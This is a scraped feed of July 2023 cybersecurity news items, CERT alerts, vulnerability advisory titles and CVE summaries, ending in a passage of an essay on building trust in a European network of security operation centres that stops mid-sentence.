SASE = SD-WAN + SSE. This simple equation has become a staple of SASE marketing and thought leadership. It identifies two elements that underpin SASE, namely the network access technology (SD-WAN) and secure internet access (Security Service Edge (SSE)).   The problem with this equation is that it is simply wrong. Here is why.   What is... The post SASE is not SD-WAN + SSE  appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-is-not-sd-wan-sse/
Security Alert (A23-07-18): Multiple Vulnerabilities in Microsoft Edge
2023-07-24T04:00:00Z | 1690171200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Novo Fascículo da Cartilha de Segurança para Internet
2023-07-21T21:15:00Z | 1689974100

Lançado novo material da Cartilha de Segurança para Internet: Fascículo Códigos Maliciosos https://cartilha.cert.br/fasciculos/#codigos-maliciosos

https://cartilha.cert.br/
Nova Estatística: Páginas Falsas
2023-07-21T21:15:00Z | 1689974100

Está no ar uma nova estatística no portal do CERT.br: Estatísticas de Páginas Falsas Utilizadas em Tentativas de Phishing https://stats.cert.br/phishing/

https://stats.cert.br/
ZEROgrid: A Dependable, Cost-Effective, Low-Emission Power System
2023-07-21T13:00:00Z | 1689944400

https://www.akamai.com/blog/sustainability/zerogrid-a-dependable-low-emission-power-system
Fuzzing on-chain contracts with Echidna
2023-07-21T11:00:31Z | 1689937231

With the release of version 2.1.0 of Echidna, our fuzzing tool for Ethereum smart contracts, we’ve introduced new features for direct retrieval of on-chain data, such as contract code and storage slot values. This data can be used to fuzz deployed contracts in their on-chain state or to test […]

https://blog.trailofbits.com/2023/07/21/fuzzing-on-chain-contracts-with-echidna/
Open Babel PQS format pFormat uninitialized pointer dereference vulnerability
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1670
Open Babel MSI format atom uninitialized pointer dereference vulnerability
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1669
Open Babel ORCA format nAtoms out-of-bounds write vulnerabilities
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1665
Open Babel translationVectors parsing out-of-bounds write vulnerabilities
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1666
Open Babel MOL2 format attribute and value out-of-bounds write vulnerability
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1664
Open Babel CSR format title out-of-bounds write vulnerability
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1667
Open Babel Gaussian format orientation out-of-bounds write vulnerability
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1672
Open Babel PQS format coord_file out-of-bounds write vulnerability
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1671
Open Babel GRO format res uninitialized pointer dereference vulnerability
2023-07-21T00:00:00Z | 1689897600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1668
Multiple Extortion: An Existential Threat
2023-07-20T13:00:00Z | 1689858000

Explore effective strategies and comprehensive cybersecurity measures to protect your organization?s data from increasingly sophisticated cybercrimes.

https://www.akamai.com/blog/security/multiple-extortion-existential-threat
Bard or ChatGPT: Cybercriminals Give Their Perspectives
2023-07-20T08:48:12Z | 1689842892

Six months ago, the question, “Which is your preferred AI?” would have sounded ridiculous. Today, a day doesn’t go by without hearing about “ChatGPT” or “Bard.” LLMs (Large Language Models) have been the main topic of discussions ever since the introduction of ChatGPT. So, which is the best LLM?   The answer may be found in... The post Bard or ChatGPT: Cybercriminals Give Their Perspectives  appeared first on Cato Networks.

https://www.catonetworks.com/blog/bard-or-chatgpt-cybercriminals-give-their-perspectives/
Security Alert (A23-07-17): Multiple Vulnerabilities in Cisco Products
2023-07-20T04:00:00Z | 1689825600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
'::ffff' only...Tips for identifying unusual network activity
2023-07-19T18:35:29Z | 1689791729

Every now and then, a security team uncovers something only the Internet Engineering Task Force (IETF) can fully explain. During a review of network activity, our team noted unusual outbound web traffic from our network. Our investigation took us from checking a simple IPv6 address to researching the IETF’s Request for Comments. What we found along the way demonstrates why monitoring for anomalous IP addresses is important for every organization.

https://www.ironnet.com/blog/ffff-only...tips-for-identifying-unusual-network-activity
The Future of the Firewall is in the Cloud
2023-07-19T12:50:12Z | 1689771012

I read with some surprise the interview with Zscaler’s CEO, Jay Chaudry, in CRN where he stated that the “network firewalls will go the way of the mainframe,” that “the network is just plumbing” and that Zscaler proxy overlay architecture will replace it with its “application switchboard.”   Well, our joint history in network security teaches... The post The Future of the Firewall is in the Cloud  appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-future-of-the-firewall-is-in-the-cloud/
Cyber weather in June was rainy on many fronts
2023-07-19T11:19:06Z | 1689765546

Cyber weather in June was rainy. Reports on social media account breaches have continued to be high. Phishing sites behind QR codes are used increasingly for phishing. Glimpses of the sun were seen as nationally granted financial support was opened for small and medium-sized enterprises (SMEs).

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_06/2023
Cyber weather in June was rainy on many fronts
2023-07-19T11:19:06Z | 1689765546

Cyber weather in June was rainy. Reports on social media account breaches have continued to be high. Phishing sites behind QR codes are used increasingly for phishing. Glimpses of the sun were seen as nationally granted financial support was opened for small and medium-sized enterprises (SMEs).

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_06/2023
Malware infections are increasingly common
2023-07-19T09:33:14Z | 1689759194

The name malware refers to many kinds of worms and viruses, as well as spyware and ransomware. Criminals are constantly making up new ways to infect devices with malware and hide their harmfulness. Malware may be difficult to detect before infection.

https://www.kyberturvallisuuskeskus.fi/en/news/malware-infections-are-increasingly-common
Malware infections are increasingly common
2023-07-19T09:33:14Z | 1689759194

The name malware refers to many kinds of worms and viruses, as well as spyware and ransomware. Criminals are constantly making up new ways to infect devices with malware and hide their harmfulness. Malware may be difficult to detect before infection.

https://www.kyberturvallisuuskeskus.fi/en/news/malware-infections-are-increasingly-common
Exploiting SteelSeries' Subapplication Mechanism for Privilege Escalation
2023-07-19T07:00:00Z | 1689750000

https://www.akamai.com/blog/security-research/exploit-steelseries-subapp-privilege-escalation
Security Alert (A23-07-15): Multiple Vulnerabilities in Google Chrome
2023-07-19T04:00:00Z | 1689739200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-07-16): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2023)
2023-07-19T04:00:00Z | 1689739200

Oracle has released the Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Foxit Reader checkThisBox type confusion vulnerability
2023-07-19T00:00:00Z | 1689724800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1795
Foxit Reader Javascript annotation destruction use-after-free vulnerability
2023-07-19T00:00:00Z | 1689724800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1796
Foxit Reader Choice Field use-after-free vulnerability
2023-07-19T00:00:00Z | 1689724800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1739
Foxit Reader Field OnBlur event use-after-free vulnerability
2023-07-19T00:00:00Z | 1689724800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1757
Foxit Reader Field Calculate event use-after-free vulnerability
2023-07-19T00:00:00Z | 1689724800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1756
Trail of Bits’s Response to OSTP National Priorities for AI RFI
2023-07-18T17:46:44Z | 1689702404

The Office of Science and Technology Policy (OSTP) has circulated a request for information (RFI) on how best to develop policies that support the responsible development of AI while minimizing risk to rights, safety, and national security. In our response, we highlight the following points: To ensure that AI […]

https://blog.trailofbits.com/2023/07/18/trail-of-bitss-response-to-ostp-national-priorities-for-ai-rfi/
The National Cyber Security Centre Finland’s weekly review – 28/2023
2023-07-18T14:19:15Z | 1689689955

This week we write about the cyber security situation during the NATO summit week and how malware infections are increasingly common.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-282023
The National Cyber Security Centre Finland’s weekly review – 28/2023
2023-07-18T14:19:15Z | 1689689955

This week we write about the cyber security situation during the NATO summit week and how malware infections are increasingly common.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-282023
Adopting Comprehensive API Security Falls Behind Need
2023-07-18T13:00:00Z | 1689685200

https://www.akamai.com/blog/security/adopting-comprehensive-api-security-falls-behind-need
RIA testib virtuaalassistentide koostööd erinevatel platvormidel
2023-07-18T07:30:43Z | 1689665443

Riigi Infosüsteemi Amet (RIA) ja Open Voice Network (OVON) testivad ühist protokolli, mis peaks tulevikus võimaldama erinevate hääljuhitavate virtuaalabiliste (nt SIRI) ja juturoboti (bürokratt) koos töötamist erinevatel tehnoloogilistel platvormidel.

https://ria.ee/uudised/ria-testib-virtuaalassistentide-koostood-erinevatel-platvormidel
FIRST POST: Jul-Sep 2023
2023-07-18T00:00:00Z | 1689638400

Message from the Chair; Conference Roundup; Special Interest Groups; Weekend Training; Training on DNS Prevention, Detection, Disruption and Defense; Diversity and Inclusion; New Board Member Introduction; M3AAWG 58 Meeting; 36th Annual FIRST Conference to take place June 9-14, 2024 in Fukuoka, Japan; New Members; Standards; Communications; Upcoming Events.

https://www.first.org/newsroom/post/202307
To SOC or not to SOC ?
2023-07-17T14:03:02Z | 1689602582

For environments that are secure by design, a 'full-fat SOC' is not always required.

https://www.ncsc.gov.uk/blog-post/soc-or-not
Keep your IT Staff happy
2023-07-17T10:45:10Z | 1689590710

The post Keep your IT Staff happy appeared first on Cato Networks.

https://www.catonetworks.com/resources/keep-your-it-staff-happy/
Microsoft Edge MSDCPDF Javascript addIcon type confusion vulnerability
2023-07-17T00:00:00Z | 1689552000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1747
Akamai?s Perspective on July?s Patch Tuesday 2023
2023-07-14T14:00:00Z | 1689343200

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-july-2023
Aging-in-Place: Why HCIT Professionals Should Adopt Zero Trust Security
2023-07-14T13:00:00Z | 1689339600

https://www.akamai.com/blog/security/hcit-professionals-should-adopt-zero-trust-security
Evaluating blockchain security maturity
2023-07-14T07:00:03Z | 1689318003

Holistic security reviews should reveal far more than simple bugs. Often, these bugs indicate deeper issues that can be challenging to understand and address. Given the time-boxed nature of reviews, security engineers may not have the opportunity to identify all bugs caused by these problems—and they may continue to […]

https://blog.trailofbits.com/2023/07/14/evaluating-blockchain-security-maturity/
Security Alert (A23-07-13): Multiple Vulnerabilities in Microsoft Edge
2023-07-14T04:00:00Z | 1689307200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
The 35th Annual FIRST Conference: Perspectives from a First-time Attendee
2023-07-14T00:01:00Z | 1689292860

In today's rapidly evolving digital landscape, the need for robust cybersecurity solutions has never been more critical.

https://www.first.org/blog/20230714-Perspectives-from-a-First-time-Attendee
(Micro)Segmentation from a Practical Perspective
2023-07-13T14:00:00Z | 1689256800

https://www.akamai.com/blog/security-research/segmentation-from-a-practical-perspective
Security Alert (A23-07-11): Multiple Vulnerabilities in SonicWall Products
2023-07-13T04:00:00Z | 1689220800

SonicWall has released a security advisory to address multiple vulnerabilities in SonicWall Analytics and GMS products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-07-12): Vulnerability in Cisco SD-WAN vManage
2023-07-13T04:00:00Z | 1689220800

Cisco released a security advisory to address a vulnerability in Cisco SD-WAN vManage.

https://www.govcert.gov.hk/en/alerts_detail.php
Apple DCERPC association groups use-after-free vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1717
Apple DCERPC presentation result list out of bounds memory access
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1659
Apple DCERPC allocation hint uninitialized memory disclosure vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1675
Apple DCERPC array marshaling uninitialized memory disclosure vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1688
Apple DCERPC fixed array use after free vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1689
Apple DCERPC alter context response use-after-free vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1678
Apple DCERPC call request uninitialized memory heap overflow vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1677
Apple DCERPC association groups heap overflow
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1676
Apple DCERPC packet stats buffer overflow vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1660
VMware vCenter Server DCERPC save_sec_fragment out-of-bounds pointer vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1740
VMware vCenter DCERPC Improper calculation of authentication trailer pointer
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1658
Apple DCERPC zero length BIND packet infinite loop
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1679
VMWare vCenter Server DCERPC association groups use-after-free vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1799
VMWare vCenter Server DCERPC presentation result list out of bounds memory access
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1800
VMware DCERPC call request uninitialized memory heap overflow vulnerability
2023-07-13T00:00:00Z | 1689206400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1801
Publicado Estudo Sobre a Comunidade de Competências em Cibersegurança
2023-07-13T00:00:00Z | 1689206400

O Observatório de Cibersegurança do CNCS acaba de publicar um Estudo sobre a Comunidade de Competências em Cibersegurança em Portugal. Este relatório tem como objetivo disponibilizar a todos os interessados informação atualizada e inédita sobre a atual comunidade de competências, de modo a sustentar decisões, estratégias e políticas públicas. Apresenta, para tanto, um mapeamento dos conhecimentos, atividades, processos, tecnologias e investigações dinamizados por entidades com competências em cibersegurança nos diferentes setores de atividade. Coloca em perspetiva e identifica a distribuição dos setores económicos de atuação da comunidade nacional, as fontes de financiamento da atividade em cibersegurança, as tendências de desenvolvimento e as mais prementes necessidades de investimento nacionais. Algumas das conclusões: As entidades que dinamizam a cibersegurança em Portugal são caracterizadas pela predominância de equipas pequenas — regularmente subdimensionadas — de especialistas, independentemente da dimensão da própria entidade; Existe excassez de profissionais na área e encontra-se pouco amadurecida a oferta de serviços terceirizados; Existe uma crescente e robusta comunidade de investigação ciêntífica e académica no setor; Os programas nacionais e europeus de inovação e investigação revelam-se importantes como fonte de financiamento para aquela comunidade; O dinamismo na investigação nacional não é suficientemente companhado pelo respetivo patenteamento ou criação e desenvolvimento no mercado de produtos e serviços. Consulte o estudo aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135788/publicado-estudo-sobre-a-comunidade-de-competencias-em-ciberseguranca
New Common Vulnerability Scoring System (CVSS) set to be cyber sector game-changer
2023-07-13T00:00:00Z | 1689206400

The latest tool will be critical to properly assess and prioritize dealing with vulnerabilities and prepare defences against cyber-attacks. Critical CVSS 4.0 will also allow consumers to assess real-time threats.

https://www.first.org/newsroom/releases/20230713
New Common Vulnerability Scoring System (CVSS) set to be cyber sector game-changer
2023-07-13T00:00:00Z | 1689206400

The latest tool will be critical to properly assess and prioritize dealing with vulnerabilities and prepare defences against cyber-attacks. Critical CVSS 4.0 will also allow consumers to assess real-time threats.

https://www.first.org/newsroom/releases/20230713
SonicWall GMS and Analytics affected by multiple vulnerabilities
2023-07-12T14:41:39Z | 1689172899

SonicWall GMS and Analytics products are affected by critical, high, and medium severity vulnerabilities. While it is important to note that there is currently no evidence of exploitation, SonicWall strongly recommends that organizations running older versions of GMS and Analytics builds upgrade to newer fixed versions. CVE Description CVSS CWE Vector CVE-2023-34123 Predictable Password Reset Key 7.5 CWE-321: Use of Hard-coded Cryptographic Key CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2023-34124 Web Service Authentication Bypass 9.4 CWE-305: Authentication Bypass by Primary Weakness CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H CVE-2023-34125 Post-Authenticated Arbitrary File Read via Backup File Directory Traversal 6.5 CWE-27: Path Traversal: 'dir/../../filename' CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CVE-2023-34126 Post-Authenticated Arbitrary File Upload 7.1 CWE-434: Unrestricted Upload of File with Dangerous Type CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N CVE-2023-34127 Post-Authenticated Command Injection 8.8 CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2023-34128 Hardcoded Tomcat Credentials (Privilege Escalation) 6.5 CWE-260: Password in Configuration File CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N CVE-2023-34129 Post-Authenticated Arbitrary File Write via Web Service (Zip Slip) 7.1 CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L CVE-2023-34130 Use of Outdated Cryptographic Algorithm with Hardcoded Key 5.3 CWE-327: Use of a Broken or Risky Cryptographic Algorithm CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N CVE-2023-34131 Unauthenticated Sensitive Information Leak 5.3 CWE-200: Exposure of Sensitive Information to an Unauthorized Actor CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2023-34132 Client-Side Hashing Function Allows Pass-the-Hash 4.9 CWE-836: Use of Password Hash Instead of Password for Authentication CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N CVE-2023-34133 Multiple Unauthenticated SQL Injection Issues & Security Filter Bypass 9.8 CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2023-34134 Password Hash Read via Web Service 9.8 CWE-200: Exposure of Sensitive Information to an Unauthorized Actor CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2023-34135 Post Authenticated Arbitrary File Read via Web Service 6.5 CWE-36: Absolute Path Traversal CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CVE-2023-34136 Unauthenticated File Upload 6.5 CWE-434: Unrestricted Upload of File with Dangerous Type CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L CVE-2023-34137 CAS Authentication Bypass 9.4 CWE-305: Authentication Bypass by Primary Weakness CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H CVE: None Last updated: July 12, 2023, 2:41 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0010
What we told the CFTC about blockchain threats
2023-07-12T11:00:13Z | 1689159613

In March, I joined the Commodity Futures Trading Commission’s Technology Advisory Committee (TAC), helping the regulatory agency navigate the complexities of cybersecurity risks, particularly in emerging technologies like AI and blockchain. During the committee’s first meeting, I discussed how the rapidly changing and public nature of blockchain technology makes it uniquely susceptible […]

https://blog.trailofbits.com/2023/07/12/what-we-told-the-cftc-about-crypto-threats/
Charting a Course for the Modern Cloud
2023-07-12T10:30:00Z | 1689157800

https://www.akamai.com/blog/cloud/charting-a-course-for-the-modern-cloud
High Threat Security Alert (A23-07-07): Multiple Vulnerabilities in Microsoft Products (July 2023)
2023-07-12T04:00:00Z | 1689134400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-07-08): Multiple Vulnerabilities in Fortinet Products
2023-07-12T04:00:00Z | 1689134400

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-07-09): Vulnerability in Firefox
2023-07-12T04:00:00Z | 1689134400

Mozilla has published the advisory (MFSA2023-26) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-07-10): Multiple Vulnerabilities in Citrix Secure Access Client
2023-07-12T04:00:00Z | 1689134400

Citrix released security advisories to address multiple vulnerabilities in Citrix Secure Access Client.

https://www.govcert.gov.hk/en/alerts_detail.php
Exploiting XSS in hidden inputs and meta tags
2023-07-11T13:00:00Z | 1689080400

In this post we are going to show how you can (ab)use the new HTML popup functionality in Chrome to exploit XSS in meta tags and hidden inputs. It all started when I noticed the new popover behaviour

https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags
Electronic SIM provides criminals with a new mode of attack
2023-07-11T09:10:34Z | 1689066634

‘SIM swapping’ has been an international topic of conversation for some time already. The scam usually starts with a phishing message, which may come through any application or communication channel. The aim is to obtain the victim’s personal information, which can then be used by the criminal to request the operator to transfer the subscription to another SIM card.

https://www.kyberturvallisuuskeskus.fi/en/news/electronic-sim-provides-criminals-new-mode-attack
Electronic SIM provides criminals with a new mode of attack
2023-07-11T09:10:34Z | 1689066634

‘SIM swapping’ has been an international topic of conversation for some time already. The scam usually starts with a phishing message, which may come through any application or communication channel. The aim is to obtain the victim’s personal information, which can then be used by the criminal to request the operator to transfer the subscription to another SIM card.

https://www.kyberturvallisuuskeskus.fi/en/news/electronic-sim-provides-criminals-new-mode-attack
QR codes are used more often in phishing
2023-07-11T09:04:07Z | 1689066247

‘Quishing’ is phishing carried out using a QR code. The victim is lured to scan a QR code with their smartphone or tablet. QR codes are easy to open using a smartphone or tablet due to their built-in camera made to recognise a QR code.

https://www.kyberturvallisuuskeskus.fi/en/news/qr-codes-are-used-more-often-phishing
QR codes are used more often in phishing
2023-07-11T09:04:07Z | 1689066247

‘Quishing’ is phishing carried out using a QR code. The victim is lured to scan a QR code with their smartphone or tablet. QR codes are easy to open using a smartphone or tablet due to their built-in camera made to recognise a QR code.

https://www.kyberturvallisuuskeskus.fi/en/news/qr-codes-are-used-more-often-phishing
The National Cyber Security Centre Finland’s weekly review – 27/2023
2023-07-11T09:00:38Z | 1689066038

This week we write about a fresh phishing phenomenon where QR codes are used for phishing. Also read about how criminals use electronic SIM cards for their scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-272023
The National Cyber Security Centre Finland’s weekly review – 27/2023
2023-07-11T09:00:38Z | 1689066038

This week we write about a fresh phishing phenomenon where QR codes are used for phishing. Also read about how criminals use electronic SIM cards for their scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-272023
Teise kvartali kokkuvõtte küberruumist: paikamata turvanõrkused ja SMS-õngitsused
2023-07-11T07:03:29Z | 1689059009

Selle aasta teise kvartali küberruumi ülevaatest selgub, et jätkuvalt moodustavad suure osa intsidentidest erinevad õngituskirjad, sealhulgas SMS-id. Paikamata turvanõrkuste tõttu on jätkuvalt sajakonna veebipoe süsteemid ebaturvalised.

https://ria.ee/uudised/teise-kvartali-kokkuvotte-kuberruumist-paikamata-turvanorkused-ja-sms-ongitsused
High Threat Security Alert (A23-07-06): Vulnerability in Apple Products
2023-07-11T04:00:00Z | 1689048000

Apple has released security updates to fix a vulnerability in macOS and Safari.

https://www.govcert.gov.hk/en/alerts_detail.php
The Seven Phases of a Ransomware Attack: A Step-by-Step Breakdown of the Attack Lifecycle
2023-07-10T21:09:27Z | 1689023367

Understanding the anatomy of a ransomware attack empowers security teams to strengthen defenses, reduce the risk of successful attacks, and protect organizations from the serious consequences of a ransomware incident. The post The Seven Phases of a Ransomware Attack: A Step-by-Step Breakdown of the Attack Lifecycle appeared first on Flashpoint.

https://flashpoint.io/blog/the-anatomy-of-a-ransomware-attack/
CVE-2023-2760
2023-07-10T11:00:00Z | 1688986800

Vector string: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') An SQL injection vulnerability exists in TapHome core HandleMessageUpdateDevicePropertiesRequest function before version 2023.2, allowing low privileged users to inject arbitrary SQL directives into an SQL query and execute arbitrary SQL commands and get full reading access. This may also lead to limited write access and temporary Denial-of-Service.

https://claroty.com/team82/disclosure-dashboard/cve-2023-2760
CVE-2023-2759
2023-07-10T10:58:00Z | 1688986680

Vector string: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" CWE: CWE-287 (Improper Authentication) A hidden API exists in TapHome'S core platform before version 2023.2 that allows an authenticated, low privileged user to change passwords of other users without any prior knowledge. The attacker may gain full access to the device by using this vulnerability.

https://claroty.com/team82/disclosure-dashboard/cve-2023-2759
A Network of SOCs?
2023-07-07T14:37:15Z | 1688740635

Preface I wrote most of this text quickly in January 2021 when the European Commission asked me to apply my lessons learned from the CSIRTs Network to a potential European Network of SOCs. During 2022, the plans for SOC collaboration have been toned down a bit, the DIGITAL Europe funding scheme proposes multiple platforms where SOCs can work together. In 2023, the newly proposed “Cyber Solidarity Act” builds upon this and codifies the concept of a “national SOC” and “cross-border SOC platforms” into an EU regulation. At the CSIRTs Network Meeting in Stockholm in June 2023 I gave a presentation on  the strenghts and flaws in the CSoA approach. A position paper / blog-post on that is in the works. The original text (with minor edits) starts below. Context The NIS Directive established the CSIRTs Network (CNW) in 2016, and the EU Cybersecurity Strategy from 2020 tries to do something similar for SOCs (Security Operation Centres). I was asked by DG-CNECT to provide some lessons identified from the CWN that might be applicable for the SOC Network (SNW). The following points are not a fully fleshed out whitepaper, instead they are a number of propositions with short explanations. The most important point is that one cannot just focus on the technical aspects of SOC collaboration. That is the easy part. We know which tools work. The same stack that we developed for the CSIRTs Network can almost 1:1 support SOC networks. Our colleagues from CCN-CERT presented the Spanish SOC Network at various meetings recently. Yes, there was one slide with their MISP setup, but the main content was the administrative side and the incentive structure they built to encourage active participation by all members. Human Element Trust Any close cooperation needs a basic level of trust between participants. The more sensitive the topic and the more damage could potentially be done by the misuse of information shared between the organisations, the more trust is needed for effective collaboration. There must be an understanding that one can rely on others to keep secrets, and to actually communicate if something important for the partner is learned. Trust is not binary Trust is not a binary thing: There is more than “I trust” or “I don’t trust”; it always depends on the concrete case if you trust someone enough to cooperate in this instance. Trust needs Time Some basic level of trust is given to others based on their position (e.g., I trust the baker to sell me edible bread; I trust every police officer to do the basics correctly), but only repeated interactions with the same person/organisation increases the trust over time. (See “The Evolution of Cooperation”) Thus, one needs to give all these networks time to establish themselves and the trust relationships. These things really take time. We are talking about years. Physical meetings (incl. social events) help Bringing people together is very helpful to bootstrap cooperation. You can’t legislate Trust There are limited possibilities to declare ex cathedra that one has to trust someone. It might work do certain degree if people are forced by external events to collaborate (e.g., call the police if you have to deal with a significant crime; or reporting requirements to authorities; or hand your kids over to day-care/school/ …). Even in these cases, these organisations have to be very careful about their reputation: misuse of their trust positions will significantly affect how much trust is given, even under duress. Persons or Teams Trust can be either anchored to persons or to organisations. I might trust a certain barber shop to get my haircut right, but I’ll prefer to go the same person if the cutter got it right the last time. Experience has shown that is possible to establish institutional trust: If I know that Team X is competently run, then I will not hesitate to use the formal contact point of that team. Still: if something is really sensitive, I will try to reach the buddy working for that other team with whom I have bonded over beer and common incidents. Group Size Close cooperation in groups cannot be sustained if the number of participants increases beyond a certain limit. This has been observed in multiple fora, amongst them FIRST, TF-CSIRT, and ops-t (which was actually an experiment in scaling trust groups). As a rule of thumb: whenever you cannot have every member of the group present their current work/topics/ideas/issues during a meeting, then the willingness to have an open sharing decreases significantly. This puts the limit at about 15 to 20 participants. If lower levels of cooperation are acceptable, then group sizes can be larger. Corollary: Group Splits If a group becomes too big, then there is a chance that core members will split off and create a new, smaller forum for more intense collaboration. This is similar to what happens with groups of animals: if one pack becomes too big to be viable, it will split up. Adding members Organic growth from within the group works best. An external membership process (as in the CNW, where existing members have no say over the inclusion of a new team from another EU Member State) can be very detrimental to the trust inside the group. Motivation Cost Any level of participation in a network of peers is not free of costs. Nobody in this business has spare time for anything. Even just passive participation via the odd telephone conference or even just reading emails costs time and is thus not free. Active participation, be it travelling to conferences, working on common projects, manually forwarding information, or setting up Machine to Machine (M2M) communication can carry significant costs. These must not exceed the benefits from the participation in the network. Corollary: Separate tooling is detrimental to sharing Sharing information into a network must be as low-friction as possible. If an analyst has to re-enter information about an incident in a different interface to share the data, then the chance is high that it will not happen. Optimally, the sharing option is built into the core systems and the overhead of sharing is just selecting with whom. Benefits The flip side is often not so easy to quantify: what are the concrete benefits of collaboration? If the bean-counters ask to justify the cost, there should be clear business reasons why the costs are worth it. “Interesting discussions” and “being a good corporate citizen” is not a long-term sustainable motivation. It must be as clear as possible what value each participant will get from such a network. Beware of freeloaders and the “Tragedy of the Commons” effect. Peers Networks work best between organisations that are comparable in size, their jobs, and their position in the market. Their technology and informational needs should be roughly the same. They should face similar tasks and challenges. For example, the SOC of VW and the SOC of Renault should have roughly the same job and thus an exchange of experiences and data might be 